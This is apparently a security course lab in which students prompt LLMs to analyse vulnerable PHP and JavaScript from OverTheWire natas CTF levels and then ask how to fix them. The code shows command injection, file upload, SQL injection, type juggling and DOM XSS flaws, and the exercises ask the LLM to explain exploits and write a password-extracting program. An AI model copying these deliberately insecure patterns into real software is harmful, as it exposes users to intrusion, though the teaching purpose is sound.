Using an LLM such as ChatGPT, Gemini , or Copilot to aid in analyzing vulnerabilities in source code and running services is one potential use for generative AI. To leverage this capability, one must be able to understand what tasks the models are reliably capable of performing. In this lab, you will utilize LLMs to automate the detection of vulnerable services and source code examples, then determine whether the results are accurate.
For this exercise, we'll be using CTF levels with known solutions so we can vet the accuracy of the LLMs in identifying vulnerabilities. One of the CTFs we will utilize is Overthewire's natas CTF. Visit the CTF at https://overthewire.org/wargames/natas/

To access individual levels, we'll need to utilize credentials discovered in prior levels. A database of (hopefully) up-to-date credentials can be found at the following Gist. Visit the link, then copy the natas1 password. Then, visit Level 1 and authenticate with the username natas1 and the password for the account from the Gist. For the subsequent levels, you will need to perform the same steps to access each level.
Access Level 6 of the natas CTF and view its source code. The PHP program for the level includes a secret from the file system and uses it in the web application to authenticate access. If one can directly access the includes/secret.inc file, the level can be solved.
<html><body>
<?
include "includes/secret.inc";
if(array_key_exists("submit", $_POST)) {
if($secret == $_POST['secret']) {
print "Access granted. The password for natas7 is <censored>";
} else {
print "Wrong secret";
}
}
?>
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
Consider the PHP program below from Level 8 of the natas Overthewire CTF. The code includes an encoded secret within the script itself. If one can decode the secret, the level can be solved.
<html><body>
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is <censored>";
} else {
print "Wrong secret";
}
}
?>
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
Command injection is a catastrophic vulnerability to have in web applications. Consider the PHP program below from Level 9 of the natas Overthewire CTF. The code allows one to search a file on the server using a given string.
<html><body>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>
Output:
<pre>
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
</pre>
</body>
</html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
Any remedy that filters characters to prevent the prior command injection vulnerability must have a complete understanding of how commands can be included in the shell. Consider the PHP program below from Level 16 of the natas Overthewire CTF. A regular expression is now used to filter the characters ;, |, &, `, ', and " from the input since they can be used to inject rogue commands in the command line.
<html><body>
For security reasons, we now filter even more on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>
Output:
<pre>
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&`\'"]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i \"$key\" dictionary.txt");
}
}
?>
</pre>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Examine the list of characters that might fix this vulnerability here. Then, prompt the LLM for instructions on how to fix the vulnerability
Consider the PHP program below from Level 12 of the natas Overthewire CTF. The code implements a file upload function that allows a user to upload a JPEG image. Unfortunately, while the form sent to the user sets the extension to .jpg, the extension is not validated at the server which uses pathinfo() in PHP to pull out the extension sent by the client.
<html><body>
<?php
function genRandomString() {
$length = 10;
$characters = "0123456789abcdefghijklmnopqrstuvwxyz";
$string = "";
for ($p = 0; $p < $length; $p++) {
$string .= $characters[mt_rand(0, strlen($characters)-1)];
}
return $string;
}
function makeRandomPath($dir, $ext) {
do {
$path = $dir."/".genRandomString().".".$ext;
} while(file_exists($path));
return $path;
}
function makeRandomPathFromFilename($dir, $fn) {
$ext = pathinfo($fn, PATHINFO_EXTENSION);
return makeRandomPath($dir, $ext);
}
if(array_key_exists("filename", $_POST)) {
$target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
echo "File is too big";
} else {
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
} else {
echo "There was an error uploading the file, please try again!";
}
}
} else {
?>
<form enctype="multipart/form-data" action="index.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="1000" />
<input type="hidden" name="filename" value="<?php print genRandomString(); ?>.jpg" />
Choose a JPEG to upload (max 1KB):<br/>
<input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>
<?php } ?>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
The next level, Level 13, is identical, but the exif_imagetype() call is used to validate that the image uploaded contains EXIF data at the beginning. Unfortunately, this check is not foolproof. Modify the previous level to add the following check. Then repeat the analysis.
if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
echo "File is too big";
} else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
echo "File is not an image";
} else {
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
SQL injection is one of the most impactful vulnerabilities in web applications. Code that is written should never include such a vulnerability and LLMs should be able to identify and to automatically fix vulnerable code. Consider the PHP program below from Level 14 of the natas Overthewire CTF. The code implements a simple login application by taking the username and password fields that the user submits and then performing a SQL query to determine whether or not they match what's in the database. It is vulnerable to the canonical SQL injection attack.
<html><body>
<?php
if(array_key_exists("username", $_REQUEST)) {
$link = mysqli_connect('localhost', 'natas14', '<censored>');
mysqli_select_db($link, 'natas14');
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
if(mysqli_num_rows(mysqli_query($link, $query)) > 0) {
echo "Successful login! The password for natas15 is <censored><br>";
} else {
echo "Access denied!<br>";
}
mysqli_close($link);
} else {
?>
<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
</form>
<?php } ?>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
The next level (natas Level 15) still contains the vulnerability, but the output of the script is either the user exists or doesn't.
<html><body>
<?php
/*
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
$link = mysqli_connect('localhost', 'natas15', '<censored>');
mysqli_select_db($link, 'natas15');
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
$res = mysqli_query($link, $query);
if($res) {
if(mysqli_num_rows($res) > 0) {
echo "This user exists.<br>";
} else {
echo "This user doesn't exist.<br>";
}
} else {
echo "Error in query.<br>";
}
mysqli_close($link);
} else {
?>
<form action="index.php" method="POST">
Username: <input name="username"><br>
<input type="submit" value="Check existence" />
</form>
<?php } ?>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have as well as for a program that can leverage the vulnerability to produce the password for the natas16 user.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
A dynamic and weakly typed programming language can lead to developers making unintended errors unless they understand the rules in which data is coerced from one type to another. Consider the PHP program below from Level 23 of the natas Overthewire CTF. The program checks for a passwd key in the request. The key's value must match the string 'iloveyou' and be greater than 10 characters. Can this ever happen?
<html><body>
Password:
<form name="input" method="get">
<input type="text" name="passwd" size=20>
<input type="submit" value="Login">
</form>
<?php
if(array_key_exists("passwd",$_REQUEST)){
if(strstr($_REQUEST["passwd"],"iloveyou") && ($_REQUEST["passwd"] > 10 )){
echo "<br>The credentials for the next level are:<br>";
echo "<pre>Username: natas24 Password: <censored></pre>";
}
else{
echo "<br>Wrong!<br>";
}
}
?>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
Another common problem with a dynamic and weakly typed programming language is type juggling where comparisons are made between values of disparate data types. When this happens, rules for performing type coercion to convert one value's data type to another's is performed. Consider the PHP program below from Level 24 of the natas Overthewire CTF. The program checks that a password matches a particular string that is kept secret at the server using the strcmp() call in PHP.
<html><body>
Password:
<form name="input" method="get">
<input type="text" name="passwd" size=20>
<input type="submit" value="Login">
</form>
<?php
if(array_key_exists("passwd",$_REQUEST)){
if(!strcmp($_REQUEST["passwd"],"<censored>")){
echo "<br>The credentials for the next level are:<br>";
echo "<pre>Username: natas25 Password: <censored></pre>";
}
else{
echo "<br>Wrong!<br>";
}
}
?>
</body></html>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
Solve the level using the exploit returned.
Prompt the LLM for instructions on how to fix the vulnerability
Cross-site scripting (XSS) is another impactful vulnerability in web applications. Consider a vulnerable Javascript snippet below.
<script type="text/javascript">
document.write('<body');
var color = unescape(document.location.search.substring(1));
if (color != '') {
document.write(' style="background-color:' + color + '"');
}
document.write('>');
</script>
Prompt the LLM with the code and ask it what vulnerability it may have and how it might be successfully exploited.
There are multiple ways to address this vulnerability. Prompt the LLM for instructions on how to fix the vulnerability using a character filtering approach where the characters that might break syntax are removed from the color parameter
Then, prompt the LLM for instructions on how to fix the vulnerability using a character encoding approach where characters that might break syntax are encoded as data in an HTML-attribute context.
Consider a vulnerable Javascript snippet below.
<h1>
<span>Search results for '</span><span id="searchMessage"></span><span>'</span>
</h1>
<script>
function doSearchQuery(query) {
document.getElementById('searchMessage').innerHTML = query;
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
doSearchQuery(query);
}
</script>